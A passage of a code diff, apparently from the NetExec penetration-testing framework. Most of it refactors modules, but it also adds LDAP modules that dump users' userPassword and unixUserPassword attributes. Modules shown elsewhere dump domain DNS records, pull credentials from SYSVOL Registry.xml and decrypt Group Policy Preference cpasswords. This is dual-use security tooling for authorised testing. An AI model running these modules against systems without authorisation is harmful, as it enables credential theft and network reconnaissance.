# No option to filter
|
# No option to filter
|
||||||
|
@ -107,10 +102,6 @@ class NXCModule:
|
||||||
if self.regex.search(description):
|
if self.regex.search(description):
|
||||||
conditionPasswordPolicy = True
|
conditionPasswordPolicy = True
|
||||||
|
|
||||||
if self.FILTER and conditionFilter and self.PASSWORDPOLICY and conditionPasswordPolicy:
|
if (conditionFilter == self.FILTER) and (conditionPasswordPolicy == self.PASSWORDPOLICY):
|
||||||
answersFiltered.append([answer[0], description])
|
|
||||||
elif not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy:
|
|
||||||
answersFiltered.append([answer[0], description])
|
|
||||||
elif not self.PASSWORDPOLICY and self.FILTER and conditionFilter:
|
|
||||||
answersFiltered.append([answer[0], description])
|
answersFiltered.append([answer[0], description])
|
||||||
return answersFiltered
|
return answersFiltered
|
||||||
|
|
|
@ -1,17 +1,18 @@
|
||||||
# Credit to https://twitter.com/snovvcrash/status/1550518555438891009
|
# Credit to https://twitter.com/snovvcrash/status/1550518555438891009
|
||||||
# Credit to https://github.com/dirkjanm/adidnsdump @_dirkjan
|
# Credit to https://github.com/dirkjanm/adidnsdump @_dirkjan
|
||||||
# module by @mpgn_x64
|
# module by @mpgn_x64
|
||||||
|
import re
|
||||||
from os.path import expanduser
|
from os.path import expanduser
|
||||||
import codecs
|
import codecs
|
||||||
import socket
|
import socket
|
||||||
from builtins import str
|
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
from struct import unpack
|
from struct import unpack
|
||||||
|
|
||||||
import dns.name
|
import dns.name
|
||||||
import dns.resolver
|
import dns.resolver
|
||||||
|
from impacket.ldap import ldap
|
||||||
from impacket.structure import Structure
|
from impacket.structure import Structure
|
||||||
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from ldap3 import LEVEL
|
from ldap3 import LEVEL
|
||||||
|
|
||||||
|
|
||||||
|
@ -37,13 +38,13 @@ def get_dns_resolver(server, context):
|
||||||
server = server[8:]
|
server = server[8:]
|
||||||
socket.inet_aton(server)
|
socket.inet_aton(server)
|
||||||
dnsresolver.nameservers = [server]
|
dnsresolver.nameservers = [server]
|
||||||
except socket.error:
|
except OSError:
|
||||||
context.info("Using System DNS to resolve unknown entries. Make sure resolving your" " target domain works here or specify an IP as target host to use that" " server for queries")
|
context.info("Using System DNS to resolve unknown entries. Make sure resolving your target domain works here or specify an IP as target host to use that server for queries")
|
||||||
return dnsresolver
|
return dnsresolver
|
||||||
|
|
||||||
|
|
||||||
def ldap2domain(ldap):
|
def ldap2domain(ldap):
|
||||||
return re.sub(",DC=", ".", ldap[ldap.lower().find("dc=") :], flags=re.I)[3:]
|
return re.sub(",DC=", ".", ldap[ldap.lower().find("dc="):], flags=re.I)[3:]
|
||||||
|
|
||||||
|
|
||||||
def new_record(rtype, serial):
|
def new_record(rtype, serial):
|
||||||
|
@ -51,7 +52,7 @@ def new_record(rtype, serial):
|
||||||
nr["Type"] = rtype
|
nr["Type"] = rtype
|
||||||
nr["Serial"] = serial
|
nr["Serial"] = serial
|
||||||
nr["TtlSeconds"] = 180
|
nr["TtlSeconds"] = 180
|
||||||
# From authoritive zone
|
# From authoritative zone
|
||||||
nr["Rank"] = 240
|
nr["Rank"] = 240
|
||||||
return nr
|
return nr
|
||||||
|
|
||||||
|
@ -82,17 +83,16 @@ def searchResEntry_to_dict(results):
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
name = "get-network"
|
name = "get-network"
|
||||||
description = ""
|
description = "Query all DNS records with the corresponding IP from the domain."
|
||||||
supported_protocols = ["ldap"]
|
supported_protocols = ["ldap"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""
|
||||||
ALL Get DNS and IP (default: false)
|
ALL Get DNS and IP (default: false)
|
||||||
ONLY_HOSTS Get DNS only (no ip) (default: false)
|
ONLY_HOSTS Get DNS only (no ip) (default: false)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.showall = False
|
self.showall = False
|
||||||
self.showhosts = False
|
self.showhosts = False
|
||||||
self.showip = True
|
self.showip = True
|
||||||
|
@ -115,29 +115,27 @@ class NXCModule:
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
zone = ldap2domain(connection.baseDN)
|
zone = ldap2domain(connection.baseDN)
|
||||||
dnsroot = "CN=MicrosoftDNS,DC=DomainDnsZones,%s" % connection.baseDN
|
dns_root = f"CN=MicrosoftDNS,DC=DomainDnsZones,{connection.baseDN}"
|
||||||
searchtarget = "DC=%s,%s" % (zone, dnsroot)
|
search_target = f"DC={zone},{dns_root}"
|
||||||
context.log.display("Querying zone for records")
|
context.log.display("Querying zone for records")
|
||||||
sfilter = "(DC=*)"
|
sfilter = "(DC=*)"
|
||||||
|
|
||||||
try:
|
try:
|
||||||
list_sites = connection.ldapConnection.search(
|
list_sites = connection.ldapConnection.search(
|
||||||
searchBase=searchtarget,
|
searchBase=search_target,
|
||||||
searchFilter=sfilter,
|
searchFilter=sfilter,
|
||||||
attributes=["dnsRecord", "dNSTombstoned", "name"],
|
attributes=["dnsRecord", "dNSTombstoned", "name"],
|
||||||
sizeLimit=100000,
|
sizeLimit=100000,
|
||||||
)
|
)
|
||||||
except ldap.LDAPSearchError as e:
|
except ldap.LDAPSearchError as e:
|
||||||
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
||||||
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the" " data received")
|
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
|
||||||
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
||||||
# paged queries
|
# paged queries
|
||||||
list_sites = e.getAnswers()
|
list_sites = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
raise
|
raise
|
||||||
targetentry = None
|
get_dns_resolver(connection.host, context.log)
|
||||||
dnsresolver = get_dns_resolver(connection.host, context.log)
|
|
||||||
|
|
||||||
outdata = []
|
outdata = []
|
||||||
|
|
||||||
|
@ -168,7 +166,7 @@ class NXCModule:
|
||||||
{
|
{
|
||||||
"name": recordname,
|
"name": recordname,
|
||||||
"type": RECORD_TYPE_MAPPING[dr["Type"]],
|
"type": RECORD_TYPE_MAPPING[dr["Type"]],
|
||||||
"value": address[list(address.fields)[0]].toFqdn(),
|
"value": address[next(iter(address.fields))].toFqdn(),
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
elif dr["Type"] == 28:
|
elif dr["Type"] == 28:
|
||||||
|
@ -182,19 +180,19 @@ class NXCModule:
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
||||||
context.log.highlight("Found %d records" % len(outdata))
|
context.log.highlight(f"Found {len(outdata)} records")
|
||||||
path = expanduser("~/.nxc/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
|
path = expanduser(f"~/.nxc/logs/{connection.domain}_network_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log")
|
||||||
with codecs.open(path, "w", "utf-8") as outfile:
|
with codecs.open(path, "w", "utf-8") as outfile:
|
||||||
for row in outdata:
|
for row in outdata:
|
||||||
if self.showhosts:
|
if self.showhosts:
|
||||||
outfile.write("{}\n".format(row["name"] + "." + connection.domain))
|
outfile.write(f"{row['name'] + '.' + connection.domain}\n")
|
||||||
elif self.showall:
|
elif self.showall:
|
||||||
outfile.write("{} \t {}\n".format(row["name"] + "." + connection.domain, row["value"]))
|
outfile.write(f"{row['name'] + '.' + connection.domain} \t {row['value']}\n")
|
||||||
else:
|
else:
|
||||||
outfile.write("{}\n".format(row["value"]))
|
outfile.write(f"{row['value']}\n")
|
||||||
context.log.success("Dumped {} records to {}".format(len(outdata), path))
|
context.log.success(f"Dumped {len(outdata)} records to {path}")
|
||||||
if not self.showall and not self.showhosts:
|
if not self.showall and not self.showhosts:
|
||||||
context.log.display("To extract CIDR from the {} ip, run the following command: cat" " your_file | mapcidr -aa -silent | mapcidr -a -silent".format(len(outdata)))
|
context.log.display(f"To extract CIDR from the {len(outdata)} ip, run the following command: cat your_file | mapcidr -aa -silent | mapcidr -a -silent")
|
||||||
|
|
||||||
|
|
||||||
class DNS_RECORD(Structure):
|
class DNS_RECORD(Structure):
|
||||||
|
@ -250,9 +248,9 @@ class DNS_COUNT_NAME(Structure):
|
||||||
def toFqdn(self):
|
def toFqdn(self):
|
||||||
ind = 0
|
ind = 0
|
||||||
labels = []
|
labels = []
|
||||||
for i in range(self["LabelCount"]):
|
for _i in range(self["LabelCount"]):
|
||||||
nextlen = unpack("B", self["RawName"][ind : ind + 1])[0]
|
nextlen = unpack("B", self["RawName"][ind: ind + 1])[0]
|
||||||
labels.append(self["RawName"][ind + 1 : ind + 1 + nextlen].decode("utf-8"))
|
labels.append(self["RawName"][ind + 1: ind + 1 + nextlen].decode("utf-8"))
|
||||||
ind += nextlen + 1
|
ind += nextlen + 1
|
||||||
# For the final dot
|
# For the final dot
|
||||||
labels.append("")
|
labels.append("")
|
|
@ -0,0 +1,63 @@
|
||||||
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
|
from impacket.ldap import ldap as ldap_impacket
|
||||||
|
from nxc.logger import nxc_logger
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
Get unixUserPassword attribute from all users in ldap
|
||||||
|
Module by @SyzikSecu
|
||||||
|
"""
|
||||||
|
|
||||||
|
name = "get-unixUserPassword"
|
||||||
|
description = "Get unixUserPassword attribute from all users in ldap"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
"""
|
||||||
|
"""
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
searchFilter = "(objectclass=user)"
|
||||||
|
|
||||||
|
try:
|
||||||
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
|
resp = connection.ldapConnection.search(
|
||||||
|
searchFilter=searchFilter,
|
||||||
|
attributes=["sAMAccountName", "unixUserPassword"],
|
||||||
|
sizeLimit=0,
|
||||||
|
)
|
||||||
|
except ldap_impacket.LDAPSearchError as e:
|
||||||
|
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
||||||
|
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
|
||||||
|
resp = e.getAnswers()
|
||||||
|
else:
|
||||||
|
nxc_logger.debug(e)
|
||||||
|
return False
|
||||||
|
|
||||||
|
answers = []
|
||||||
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
|
for item in resp:
|
||||||
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
|
continue
|
||||||
|
sAMAccountName = ""
|
||||||
|
unixUserPassword = []
|
||||||
|
try:
|
||||||
|
for attribute in item["attributes"]:
|
||||||
|
if str(attribute["type"]) == "sAMAccountName":
|
||||||
|
sAMAccountName = str(attribute["vals"][0])
|
||||||
|
elif str(attribute["type"]) == "unixUserPassword":
|
||||||
|
unixUserPassword = [str(i) for i in attribute["vals"]]
|
||||||
|
if sAMAccountName != "" and len(unixUserPassword) > 0:
|
||||||
|
answers.append([sAMAccountName, unixUserPassword])
|
||||||
|
except Exception as e:
|
||||||
|
context.log.debug("Exception:", exc_info=True)
|
||||||
|
context.log.debug(f"Skipping item, cannot process due to error {e!s}")
|
||||||
|
if len(answers) > 0:
|
||||||
|
context.log.success("Found following users: ")
|
||||||
|
for answer in answers:
|
||||||
|
context.log.highlight(f"User: {answer[0]} unixUserPassword: {answer[1]}")
|
||||||
|
else:
|
||||||
|
context.log.fail("No unixUserPassword Found")
|
|
@ -0,0 +1,63 @@
|
||||||
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
|
from impacket.ldap import ldap as ldap_impacket
|
||||||
|
from nxc.logger import nxc_logger
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
Get userPassword attribute from all users in ldap
|
||||||
|
Module by @SyzikSecu
|
||||||
|
"""
|
||||||
|
|
||||||
|
name = "get-userPassword"
|
||||||
|
description = "Get userPassword attribute from all users in ldap"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
"""
|
||||||
|
"""
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
searchFilter = "(objectclass=user)"
|
||||||
|
|
||||||
|
try:
|
||||||
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
|
resp = connection.ldapConnection.search(
|
||||||
|
searchFilter=searchFilter,
|
||||||
|
attributes=["sAMAccountName", "userPassword"],
|
||||||
|
sizeLimit=0,
|
||||||
|
)
|
||||||
|
except ldap_impacket.LDAPSearchError as e:
|
||||||
|
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
||||||
|
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
|
||||||
|
resp = e.getAnswers()
|
||||||
|
else:
|
||||||
|
nxc_logger.debug(e)
|
||||||
|
return False
|
||||||
|
|
||||||
|
answers = []
|
||||||
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
|
for item in resp:
|
||||||
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
|
continue
|
||||||
|
sAMAccountName = ""
|
||||||
|
userPassword = []
|
||||||
|
try:
|
||||||
|
for attribute in item["attributes"]:
|
||||||
|
if str(attribute["type"]) == "sAMAccountName":
|
||||||
|
sAMAccountName = str(attribute["vals"][0])
|
||||||
|
elif str(attribute["type"]) == "userPassword":
|
||||||
|
userPassword = [str(i) for i in attribute["vals"]]
|
||||||
|
if sAMAccountName != "" and len(userPassword) > 0:
|
||||||
|
answers.append([sAMAccountName, userPassword])
|
||||||
|
except Exception as e:
|
||||||
|
context.log.debug("Exception:", exc_info=True)
|
||||||
|
context.log.debug(f"Skipping item, cannot process due to error {e!s}")
|
||||||
|
if len(answers) > 0:
|
||||||
|
context.log.success("Found following users: ")
|
||||||
|
for answer in answers:
|
||||||
|
context.log.highlight(f"User: {answer[0]} userPassword: {answer[1]}")
|
||||||
|
else:
|
||||||
|
context.log.fail("No userPassword Found")
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
from nxc.helpers.logger import write_log
|
from nxc.helpers.logger import write_log
|
||||||
import json
|
import json
|
||||||
|
@ -20,14 +17,11 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""No options"""
|
||||||
No options
|
|
||||||
"""
|
|
||||||
pass
|
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
data = []
|
data = []
|
||||||
cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
|
cards = connection.wmi("select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
|
||||||
if cards:
|
if cards:
|
||||||
for c in cards:
|
for c in cards:
|
||||||
if c["IPAddress"].get("value"):
|
if c["IPAddress"].get("value"):
|
||||||
|
@ -35,6 +29,6 @@ class NXCModule:
|
||||||
|
|
||||||
data.append(cards)
|
data.append(cards)
|
||||||
|
|
||||||
log_name = "network-connections-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
|
log_name = f"network-connections-{connection.host}-{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log"
|
||||||
write_log(json.dumps(data), log_name)
|
write_log(json.dumps(data), log_name)
|
||||||
context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")
|
context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import xml.etree.ElementTree as ET
|
import xml.etree.ElementTree as ET
|
||||||
from io import BytesIO
|
from io import BytesIO
|
||||||
|
|
||||||
|
@ -30,7 +27,7 @@ class NXCModule:
|
||||||
paths = connection.spider("SYSVOL", pattern=["Registry.xml"])
|
paths = connection.spider("SYSVOL", pattern=["Registry.xml"])
|
||||||
|
|
||||||
for path in paths:
|
for path in paths:
|
||||||
context.log.display("Found {}".format(path))
|
context.log.display(f"Found {path}")
|
||||||
|
|
||||||
buf = BytesIO()
|
buf = BytesIO()
|
||||||
connection.conn.getFile("SYSVOL", path, buf.write)
|
connection.conn.getFile("SYSVOL", path, buf.write)
|
||||||
|
@ -56,7 +53,7 @@ class NXCModule:
|
||||||
domains.append(attrs["value"])
|
domains.append(attrs["value"])
|
||||||
|
|
||||||
if usernames or passwords:
|
if usernames or passwords:
|
||||||
context.log.success("Found credentials in {}".format(path))
|
context.log.success(f"Found credentials in {path}")
|
||||||
context.log.highlight("Usernames: {}".format(usernames))
|
context.log.highlight(f"Usernames: {usernames}")
|
||||||
context.log.highlight("Domains: {}".format(domains))
|
context.log.highlight(f"Domains: {domains}")
|
||||||
context.log.highlight("Passwords: {}".format(passwords))
|
context.log.highlight(f"Passwords: {passwords}")
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import xml.etree.ElementTree as ET
|
import xml.etree.ElementTree as ET
|
||||||
from Cryptodome.Cipher import AES
|
from Cryptodome.Cipher import AES
|
||||||
from base64 import b64decode
|
from base64 import b64decode
|
||||||
|
@ -43,7 +40,7 @@ class NXCModule:
|
||||||
)
|
)
|
||||||
|
|
||||||
for path in paths:
|
for path in paths:
|
||||||
context.log.display("Found {}".format(path))
|
context.log.display(f"Found {path}")
|
||||||
|
|
||||||
buf = BytesIO()
|
buf = BytesIO()
|
||||||
connection.conn.getFile("SYSVOL", path, buf.write)
|
connection.conn.getFile("SYSVOL", path, buf.write)
|
||||||
|
@ -57,10 +54,7 @@ class NXCModule:
|
||||||
sections.append("./NTService/Properties")
|
sections.append("./NTService/Properties")
|
||||||
|
|
||||||
elif "ScheduledTasks.xml" in path:
|
elif "ScheduledTasks.xml" in path:
|
||||||
sections.append("./Task/Properties")
|
sections.extend(("./Task/Properties", "./ImmediateTask/Properties", "./ImmediateTaskV2/Properties", "./TaskV2/Properties"))
|
||||||
sections.append("./ImmediateTask/Properties")
|
|
||||||
sections.append("./ImmediateTaskV2/Properties")
|
|
||||||
sections.append("./TaskV2/Properties")
|
|
||||||
|
|
||||||
elif "DataSources.xml" in path:
|
elif "DataSources.xml" in path:
|
||||||
sections.append("./DataSource/Properties")
|
sections.append("./DataSource/Properties")
|
||||||
|
@ -88,11 +82,11 @@ class NXCModule:
|
||||||
|
|
||||||
password = self.decrypt_cpassword(props["cpassword"])
|
password = self.decrypt_cpassword(props["cpassword"])
|
||||||
|
|
||||||
context.log.success("Found credentials in {}".format(path))
|
context.log.success(f"Found credentials in {path}")
|
||||||
context.log.highlight("Password: {}".format(password))
|
context.log.highlight(f"Password: {password}")
|
||||||
for k, v in props.items():
|
for k, v in props.items():
|
||||||
if k != "cpassword":
|
if k != "cpassword":
|
||||||
context.log.highlight("{}: {}".format(k, v))
|
context.log.highlight(f"{k}: {v}")
|
||||||
|
|
||||||
hostid = context.db.get_hosts(connection.host)[0][0]
|
hostid = context.db.get_hosts(connection.host)[0][0]
|
||||||
context.db.add_credential(
|
context.db.add_credential(
|
||||||
|
|
|
@ -0,0 +1,91 @@
|
||||||
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
Module by CyberCelt: @Cyb3rC3lt
|
||||||
|
|
||||||
|
Initial module:
|
||||||
|
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
||||||
|
"""
|
||||||
|
|
||||||
|
name = "group-mem"
|
||||||
|
description = "Retrieves all the members within a Group"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = False
|
||||||
|
primaryGroupID = ""
|
||||||
|
answers = []
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
"""
|
||||||
|
group-mem: Specify group-mem to call the module
|
||||||
|
GROUP: Specify the GROUP option to query for that group's members
|
||||||
|
Usage: nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins"
|
||||||
|
nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers"
|
||||||
|
"""
|
||||||
|
self.GROUP = ""
|
||||||
|
|
||||||
|
if "GROUP" in module_options:
|
||||||
|
self.GROUP = module_options["GROUP"]
|
||||||
|
else:
|
||||||
|
context.log.error("GROUP option is required!")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
# First look up the SID of the group passed in
|
||||||
|
search_filter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
||||||
|
attribute = "objectSid"
|
||||||
|
|
||||||
|
search_result = do_search(self, context, connection, search_filter, attribute)
|
||||||
|
# If no SID for the Group is returned exit the program
|
||||||
|
if search_result is None:
|
||||||
|
context.log.success('Unable to find any members of the "' + self.GROUP + '" group')
|
||||||
|
return True
|
||||||
|
|
||||||
|
# Convert the binary SID to a primaryGroupID string to be used further
|
||||||
|
sid_string = connection.sid_to_str(search_result).split("-")
|
||||||
|
self.primaryGroupID = sid_string[-1]
|
||||||
|
|
||||||
|
# Look up the groups DN
|
||||||
|
search_filter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
||||||
|
attribute = "distinguishedName"
|
||||||
|
distinguished_name = (do_search(self, context, connection, search_filter, attribute)).decode("utf-8")
|
||||||
|
|
||||||
|
# Carry out the search
|
||||||
|
search_filter = "(|(memberOf=" + distinguished_name + ")(primaryGroupID=" + self.primaryGroupID + "))"
|
||||||
|
attribute = "sAMAccountName"
|
||||||
|
search_result = do_search(self, context, connection, search_filter, attribute)
|
||||||
|
|
||||||
|
if len(self.answers) > 0:
|
||||||
|
context.log.success("Found the following members of the " + self.GROUP + " group:")
|
||||||
|
for answer in self.answers:
|
||||||
|
context.log.highlight(f"{answer[0]}")
|
||||||
|
|
||||||
|
|
||||||
|
# Carry out an LDAP search for the Group with the supplied Group name
|
||||||
|
def do_search(self, context, connection, searchFilter, attributeName):
|
||||||
|
try:
|
||||||
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
|
resp = connection.ldapConnection.search(searchFilter=searchFilter, attributes=[attributeName], sizeLimit=0)
|
||||||
|
context.log.debug(f"Total number of records returned {len(resp)}")
|
||||||
|
for item in resp:
|
||||||
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
|
continue
|
||||||
|
attribute_value = ""
|
||||||
|
try:
|
||||||
|
for attribute in item["attributes"]:
|
||||||
|
if str(attribute["type"]) == attributeName:
|
||||||
|
if attributeName in ["objectSid", "distinguishedName"]:
|
||||||
|
return bytes(attribute["vals"][0])
|
||||||
|
else:
|
||||||
|
attribute_value = str(attribute["vals"][0])
|
||||||
|
if attribute_value is not None:
|
||||||
|
self.answers.append([attribute_value])
|
||||||
|
except Exception as e:
|
||||||
|
context.log.debug("Exception:", exc_info=True)
|
||||||
|
context.log.debug(f"Skipping item, cannot process due to error {e}")
|
||||||
|
except Exception as e:
|
||||||
|
context.log.debug(f"Exception: {e}")
|
||||||
|
return False
|
|
@ -1,100 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
|
||||||
|
|
||||||
class NXCModule:
|
|
||||||
'''
|
|
||||||
Module by CyberCelt: @Cyb3rC3lt
|
|
||||||
|
|
||||||
Initial module:
|
|
||||||
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
|
||||||
'''
|
|
||||||
|
|
||||||
name = 'group-mem'
|
|
||||||
description = 'Retrieves all the members within a Group'
|
|
||||||
supported_protocols = ['ldap']
|
|
||||||
opsec_safe = True
|
|
||||||
multiple_hosts = False
|
|
||||||
primaryGroupID = ''
|
|
||||||
answers = []
|
|
||||||
|
|
||||||
def options(self, context, module_options):
|
|
||||||
'''
|
|
||||||
group-mem: Specify group-mem to call the module
|
|
||||||
GROUP: Specify the GROUP option to query for that group's members
|
|
||||||
Usage: nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain admins"
|
|
||||||
nxc ldap $DC-IP -u Username -p Password -M group-mem -o GROUP="domain controllers"
|
|
||||||
'''
|
|
||||||
|
|
||||||
self.GROUP = ''
|
|
||||||
|
|
||||||
if 'GROUP' in module_options:
|
|
||||||
self.GROUP = module_options['GROUP']
|
|
||||||
else:
|
|
||||||
context.log.error('GROUP option is required!')
|
|
||||||
exit(1)
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
|
||||||
|
|
||||||
#First look up the SID of the group passed in
|
|
||||||
searchFilter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
|
||||||
attribute = "objectSid"
|
|
||||||
|
|
||||||
searchResult = doSearch(self, context, connection, searchFilter, attribute)
|
|
||||||
#If no SID for the Group is returned exit the program
|
|
||||||
if searchResult is None:
|
|
||||||
context.log.success('Unable to find any members of the "' + self.GROUP + '" group')
|
|
||||||
return True
|
|
||||||
|
|
||||||
# Convert the binary SID to a primaryGroupID string to be used further
|
|
||||||
sidString = connection.sid_to_str(searchResult).split("-")
|
|
||||||
self.primaryGroupID = sidString[-1]
|
|
||||||
|
|
||||||
#Look up the groups DN
|
|
||||||
searchFilter = "(&(objectCategory=group)(cn=" + self.GROUP + "))"
|
|
||||||
attribute = "distinguishedName"
|
|
||||||
distinguishedName = (doSearch(self, context, connection, searchFilter, attribute)).decode("utf-8")
|
|
||||||
|
|
||||||
# Carry out the search
|
|
||||||
searchFilter = "(|(memberOf="+distinguishedName+")(primaryGroupID="+self.primaryGroupID+"))"
|
|
||||||
attribute = "sAMAccountName"
|
|
||||||
searchResult = doSearch(self, context, connection, searchFilter, attribute)
|
|
||||||
|
|
||||||
if len(self.answers) > 0:
|
|
||||||
context.log.success('Found the following members of the ' + self.GROUP + ' group:')
|
|
||||||
for answer in self.answers:
|
|
||||||
context.log.highlight(u'{}'.format(answer[0]))
|
|
||||||
|
|
||||||
# Carry out an LDAP search for the Group with the supplied Group name
|
|
||||||
def doSearch(self,context, connection,searchFilter,attributeName):
|
|
||||||
try:
|
|
||||||
context.log.debug('Search Filter=%s' % searchFilter)
|
|
||||||
resp = connection.ldapConnection.search(searchFilter=searchFilter,
|
|
||||||
attributes=[attributeName],
|
|
||||||
sizeLimit=0)
|
|
||||||
context.log.debug('Total no. of records returned %d' % len(resp))
|
|
||||||
for item in resp:
|
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
|
||||||
continue
|
|
||||||
attributeValue = '';
|
|
||||||
try:
|
|
||||||
for attribute in item['attributes']:
|
|
||||||
if str(attribute['type']) == attributeName:
|
|
||||||
if attributeName == "objectSid":
|
|
||||||
attributeValue = bytes(attribute['vals'][0])
|
|
||||||
return attributeValue;
|
|
||||||
elif attributeName == "distinguishedName":
|
|
||||||
attributeValue = bytes(attribute['vals'][0])
|
|
||||||
return attributeValue;
|
|
||||||
else:
|
|
||||||
attributeValue = str(attribute['vals'][0])
|
|
||||||
if attributeValue is not None:
|
|
||||||
self.answers.append([attributeValue])
|
|
||||||
except Exception as e:
|
|
||||||
context.log.debug("Exception:", exc_info=True)
|
|
||||||
context.log.debug('Skipping item, cannot process due to error %s' % str(e))
|
|
||||||
pass
|
|
||||||
except Exception as e:
|
|
||||||
context.log.debug("Exception:", e)
|
|
||||||
return False
|
|
|
@ -1,8 +1,6 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from impacket.ldap import ldap as ldap_impacket
|
from impacket.ldap import ldap as ldap_impacket
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
|
@ -21,27 +19,24 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""USER Choose a username to query group membership"""
|
||||||
USER Choose a username to query group membership
|
|
||||||
"""
|
|
||||||
|
|
||||||
self.user = ""
|
self.user = ""
|
||||||
if "USER" in module_options:
|
if "USER" in module_options:
|
||||||
if module_options["USER"] == "":
|
if module_options["USER"] == "":
|
||||||
context.log.fail("Invalid value for USER option!")
|
context.log.fail("Invalid value for USER option!")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
self.user = module_options["USER"]
|
self.user = module_options["USER"]
|
||||||
else:
|
else:
|
||||||
context.log.fail("Missing USER option, use --options to list available parameters")
|
context.log.fail("Missing USER option, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
